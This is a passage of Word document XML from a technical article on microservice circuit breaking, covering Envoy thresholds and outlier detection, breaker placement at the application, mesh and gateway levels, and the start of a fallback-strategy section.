    <w:p w14:paraId="716F9CDD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breakers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E1B01C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  thresholds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E1CAE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    - priority: DEFAULT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460F1860" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      max_connections: 1000        # max concurrent TCP connections to upstream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C26FA8F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      max_pending_requests: 1000   # max requests queued waiting for a connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E671811" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      max_requests: 1000           # max concurrent active requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24130F08" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      max_retries: 3               # max concurrent retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A346AFE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>When any threshold is exceeded, new requests are </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>immediately rejected with 503</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — the circuit "breaks" in the sense that excess load is shed, but the mechanism is threshold-based rather than failure-rate-based.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F957E2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Envoy's Outlier Detection — The Passive Health Checker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AD4920" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Envoy's </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>outlier detection</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> is the closer equivalent to Resilience4j's circuit breaker — it monitors error rates per upstream host and ejects failing hosts from the load balancing pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DB2A2A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>YAML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED696C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>outlier_detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F217BE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  consecutive_5xx: 5                    # eject after 5 consecutive 5xx responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785C71D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  consecutive_gateway_errors: 5         # eject after 5 consecutive 502/503/504</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22347D60" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  interval: 10s                         # evaluation interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BA9D8C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  base_ejection_time: 30s               # initial ejection duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3ADD3F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  max_ejection_percent: 50              # never eject more than 50% of hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5946AE79" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  success_rate_minimum_hosts: 5         # need at least 5 hosts for rate-based ejection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A04A14" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  success_rate_request_volume: 100      # need at least 100 requests for rate-based ejection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4686E2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  success_rate_stdev_factor: 1900       # eject if success rate &lt; mean - 1.9*stdev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB1469F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-host ejection (not per-service circuit breaking):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF1647" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Envoy ejects individual upstream </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> (specific pod IP:port) rather than the entire service. If one pod is failing (bad deployment, hardware issue, memory leak), only that pod is ejected — other healthy pods continue receiving traffic. This is finer-grained than Resilience4j's per-service circuit breaker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71369DCC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ejection lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57508CA0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482FB728" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Host fails consecutive_5xx threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69925BFC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  → Host marked as ejected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDFC650" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  → Removed from load balancing pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7B6E4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  → ejection_duration = base_ejection_time × ejection_count (exponential backoff)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC01BC6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF657B1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>After ejection_duration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8EF631" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  → Host re-admitted to pool with reduced weight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D87AE49" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  → If it fails again → ejected with 2x ejection_duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4936035B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  → If it succeeds → ejection_count decremented, weight restored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382B95EC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The max_ejection_percent safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B234CBB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>If 8 of 10 hosts are failing, ejecting all of them leaves only 2 hosts to handle all traffic — potentially overloading them. max_ejection_percent: 50 ensures at least 50% of hosts remain in the pool even if more than 50% are failing. This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>panic mode prevention</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — maintaining some traffic handling capacity even during widespread failure, accepting some failed requests rather than routing everything to an impossibly small set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1443A583" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="00C027E9">
          <v:rect id="_x0000_i4107" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02314492" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Circuit Breaker Placement — Where in the Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37204E6F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-Level Circuit Breaking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6DD768" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breakers embedded in application code (via Resilience4j, Hystrix, Polly, etc.) operate at the </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>method call level</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t>. Each call to a downstream service is wrapped:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EDB4E2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F40FE92" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Payment Service → Circuit Breaker wrapping → HTTP call to Fraud Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B72F0EC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239144F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="969"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fine-grained control:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Different circuit breakers per downstream service, per operation type within a service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F3FD3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="969"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rich fallback logic:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The application can implement sophisticated fallback behavior (serve from cache, use a secondary service, return a degraded response with partial data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F104CCE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="969"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Business-aware failure classification:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Application code can distinguish between "this error means the service is down" vs "this error is a business logic rejection" — circuit breaker only opens for the former.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5F5BCA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3851563C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="970"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Language/framework specific:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Every service in every language needs a circuit breaker library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23660D65" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="970"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inconsistent implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Teams may configure circuit breakers differently — different thresholds, different failure classifications, different fallbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1CAE1D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="970"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operational visibility fragmentation:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Each service's circuit breaker state is visible only to that service (unless metrics are exported).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705060E1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Infrastructure-Level Circuit Breaking (Service Mesh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A1897A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breaking via sidecar proxy (Envoy in Istio/Linkerd) operates at the </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network connection level</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t>. No application code changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E240356" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A0B0F1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Language-agnostic:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Works for services in any language. The sidecar handles all circuit breaking transparently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0D7F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Circuit breaker policies defined centrally in the service mesh control plane — uniform across all services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745993A3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operational centralization:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> All circuit breaker states visible from one place (Kiali, Jaeger, the mesh's observability stack).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B81D8EA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6B56DC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="972"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Coarser granularity:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Operates at connection/request level, not at method or operation level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F00532" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="972"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No business logic awareness:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The sidecar can't distinguish between a 500 that means "payment service is down" vs "payment rejected due to fraud" — both look like failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A042FBF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="972"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limited fallback options:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The sidecar can return a 503 but can't implement sophisticated application-level fallbacks (serving cached data, calling a secondary service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA89165" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API Gateway Circuit Breaking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DEB5D3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>The API gateway can implement circuit breaking at the </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>service boundary</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — between external clients and internal services. If the Payment Service is failing, the gateway circuit breaker prevents clients from reaching it and returns appropriate errors immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F202DF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The gateway circuit breaker adds a layer orthogonal to application-level circuit breakers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6764E6B9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Application circuit breakers: service-to-service calls within the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F42C83" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Gateway circuit breakers: external client-to-service calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C673F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A failing payment service might trip both: the API gateway circuit breaker (preventing external clients from waiting), AND the order service's internal circuit breaker (preventing the order service from cascading failure when calling payment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1A491" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="66C7D628">
          <v:rect id="_x0000_i4108" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E432FDC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Fallback Strategies — What to Do When the Circuit Is Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428FD4F4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit breaker's rejection is not the end — it is a signal to the caller to </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>execute a fallback</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t>. The quality of the fallback determines the user experience during the downstream outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E959CD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fallback Hierarchy — From Best to Worst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26DA0C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tier 1 — Cached Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0687F0A1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
